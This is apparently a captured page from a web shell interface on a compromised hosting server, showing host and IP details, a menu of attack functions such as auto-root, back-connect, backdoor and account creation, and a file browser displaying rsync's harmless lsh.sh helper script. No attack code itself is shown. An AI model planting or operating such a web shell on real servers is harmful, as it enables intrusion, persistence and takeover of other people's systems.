Linux clientvps21.redlake.in 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
LiteSpeed
: 95.216.48.241 | : 216.73.217.57
14 Domain
8.1.34
mydemowebs
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
rsync /
support /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
80
B
-rw-r--r--
atomic-rsync
5.07
KB
-rw-r--r--
cvs2includes
1.19
KB
-rw-r--r--
deny-rsync
1005
B
-rw-r--r--
file-attr-restore
4.82
KB
-rw-r--r--
files-to-excludes
538
B
-rw-r--r--
git-set-file-times
3.81
KB
-rw-r--r--
instant-rsyncd
2.73
KB
-rw-r--r--
logfilter
1.08
KB
-rw-r--r--
lsh
3.03
KB
-rw-r--r--
lsh.sh
1.08
KB
-rw-r--r--
mapfrom
633
B
-rw-r--r--
mapto
625
B
-rw-r--r--
mnt-excl
1.8
KB
-rw-r--r--
munge-symlinks
2.56
KB
-rw-r--r--
nameconvert
1.49
KB
-rw-r--r--
rrsync
12.32
KB
-rw-r--r--
rrsync.1.md
4.28
KB
-rw-r--r--
rsync-no-vanished
593
B
-rw-r--r--
rsync-slash-strip
769
B
-rw-r--r--
rsyncstats
8.49
KB
-rw-r--r--
savetransfer.c
4.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lsh.sh
#!/bin/sh # This script can be used as a "remote shell" command that is only # capable of pretending to connect to "localhost". This is useful # for testing or for running a local copy where the sender and the # receiver needs to use different options (e.g. --fake-super). If # we get a -l USER option, we try to use "sudo -u USER" to run the # command. Supports only the hostnames "localhost" and "lh", with # the latter implying the --no-cd option. user='' do_cd=y # Default path is user's home dir (just like ssh) unless host is "lh". while : ; do case "$1" in -l) user="$2"; shift; shift ;; -l*) user=`echo "$1" | sed 's/^-l//'`; shift ;; --no-cd) do_cd=n; shift ;; -*) shift ;; localhost) shift; break ;; lh) do_cd=n; shift; break ;; *) echo "lsh: unable to connect to host $1" 1>&2; exit 1 ;; esac done if [ "$user" ]; then prefix='' if [ $do_cd = y ]; then home=`perl -e "print((getpwnam('$user'))[7])"` prefix="cd '$home' &&" fi sudo -H -u "$user" sh -c "$prefix $*" else if [ $do_cd = y ]; then cd || exit 1 fi eval "${@}" fi
Close